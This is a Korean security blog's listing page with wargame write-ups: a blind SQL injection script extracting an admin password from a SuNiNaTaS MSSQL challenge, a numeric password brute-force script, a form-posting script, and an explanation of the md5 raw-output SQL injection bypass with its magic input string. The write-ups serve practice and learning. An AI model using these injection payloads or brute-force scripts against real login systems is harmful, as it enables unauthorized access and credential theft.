'분류 전체보기'에 해당되는 글 438건

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

[root-me] Local File Inclusion

2018. 5. 22. 01:03

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

반응형

처음엔 pw 부분에 했는데 계속 No Hack이 떠서 뭐지? 했다.

그러다 id에 하니까 잘 된다.


그리고 요즘 워게임에서 mysql만 쓰다보니 당연히 mysql 문법으로 진행하는데 뭔가 이상해서 테스트해보니 mssql이였다.


그래서 mssql 문법으로 진행하니 잘 되었다.


mssql의 문자열함수는 아래 블로그를 통해 확인하였다.

http://egloos.zum.com/clearm81/v/198485


아래의 방법으로 길이가 총 10자리인 것을 확인하였다.


아래와 같이 코드를 짰는데 인터넷이 이상해서 계속 끊켜서 못해먹겠다..ㅠㅠ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib
import urllib2
 
result =''
 
for i in range(1,11):
    for j in range(32,128):
        print "Testing " + str(i) + " : " + str(j)
        url="http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and+unicode(substring(pw,"+str(i)+",1))="+str(j)+"--+&pw=guest"
 
        request = urllib2.Request(url)
        request.add_header('Cookie','ASPSESSIONIDASASDRCS=IOKBKGGBNLMKJAGAGCCJHOGL')
 
        response = urllib2.urlopen(request)
 
        if response.read().find("False"!= -1:
            print "[+] "+ str(i) + " : " + chr(j)
            result += chr(j)
            break
cs


수동으로 하여 답을 찾았다.


수동으로는 이런식으로 범위로 하여 찾았다~


와..인터넷을 고쳐야지...ㅠㅠ

반응형

'Hacking > Web' 카테고리의 다른 글

Web Application Firewall (WAF) Evasion Techniques #2  (0) 2018.06.03
Web Application Firewall (WAF) Evasion Techniques  (0) 2018.06.03
sql injection using md5  (0) 2018.05.09
Blind SQL Injection tool 분석  (4) 2018.05.06
Padding Oracle Attack  (0) 2018.05.01
블로그 이미지

rootable

,
반응형

이전에는 Burp의 Intruder 기능을 이용하여 풀었지만 Python 연습도 할겸 Python으로 풀었다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import urllib2
import urllib
 
url = 'http://suninatas.com/Part_one/web08/web08.asp'
 
for i in range(0,10000):
    data = {"id":"admin","pw":str(i)}
    data = urllib.urlencode(data)
    
    request = urllib2.Request(url,data)
    request.add_header('Cookie','ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF')
 
    response = urllib2.urlopen(request)
    
    if response.read().find("Incorrect")==-1:
        print "[+] success : " +data
        break
 
    print "[-] fail : " + data
cs


반응형

'Solve Problem' 카테고리의 다른 글

[PythonChallenge] 2번  (0) 2018.09.02
[PythonChallenge] 1번  (0) 2018.09.02
[SuNiNaTaS] 7번 문제  (0) 2018.05.10
[wargame.kr] QnA  (0) 2018.05.06
[Wargame.kr] dun_worry_about_the_vase  (0) 2018.05.02
블로그 이미지

rootable

,
반응형

해당 문제에 접근하면 아이유와 윤아 사진이 나오고 그 사이에 YES 버튼이 있다.

 

그 버튼을 빨리 누르면 문제가 풀릴 것 같아 파이썬으로 코드를 작성하여 문제를 해결하였다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import urllib2
import urllib
 
# GET 방식
url='http://suninatas.com/Part_one/web07/web07.asp'
request = urllib2.Request(url)
request.add_header('Cookie','ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF')
 
response = urllib2.urlopen(request)
print response.read()
 
# POST 방
url2='http://suninatas.com/Part_one/web07/web07_1.asp'
data={"web07":"Do U Like girls?"}
data=urllib.urlencode(data)
request2 = urllib2.Request(url2,data)
request2.add_header("Cookie","ASPSESSIONIDASASDRCS=NGJBKGGBOGDFNGMGADBFNCPF")
response2 = urllib2.urlopen(request2)
print response2.read()
 
cs


반응형

'Solve Problem' 카테고리의 다른 글

[PythonChallenge] 1번  (0) 2018.09.02
[SuNiNaTaS] 8번 문제  (0) 2018.05.10
[wargame.kr] QnA  (0) 2018.05.06
[Wargame.kr] dun_worry_about_the_vase  (0) 2018.05.02
[RedTiger's Hackit] 올클리어  (0) 2018.02.03
블로그 이미지

rootable

,
반응형

md5("admin") 의 경우에는 왼쪽과 같이 21232f297a57a5a743894a0e4a801fc3으로 출력되지만 

md5("admin",true)와 같이 코딩되어 있을 경우에는 오른쪽과 같이 바이너리 형식으로 반환된다.



옵션으로 준 TRUE값은 raw_output에 대한 TRUE 값으로 바이너리 형식으로 출력하겠따는 의미이다.


참고 ) http://php.net/manual/kr/function.md5.php


따라서 SQL Injection 문제에서 md5 부분에 true로 되어있다면 이 기법을 생각해봐라


129581926211651571912466741651878684928


md5("129581926211651571912466741651878684928",true) 하면 바이너리형태로 아래와 같이 출력된다.


�T0D��o#��'or'8


따라서 만약 select * from test where id='$id' and pw='$pw' 과 같은 쿼리일 때 $pw부분에 위의 결과가 들어가


select * from test where id='$id' and pw='�T0D��o#��' or '8' 가 되어 '8' 부분에 의해 True가되어 결과가 출력된다.



참고 ) http://bbolmin.tistory.com/77



반응형

'Hacking > Web' 카테고리의 다른 글

Web Application Firewall (WAF) Evasion Techniques  (0) 2018.06.03
[SuNiNaTaS] 22번 문제  (0) 2018.05.10
Blind SQL Injection tool 분석  (4) 2018.05.06
Padding Oracle Attack  (0) 2018.05.01
자바스크립트 난독화  (0) 2018.05.01
블로그 이미지

rootable

,

[wargame.kr] adm1nkyj

2018. 5. 9. 11:34

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.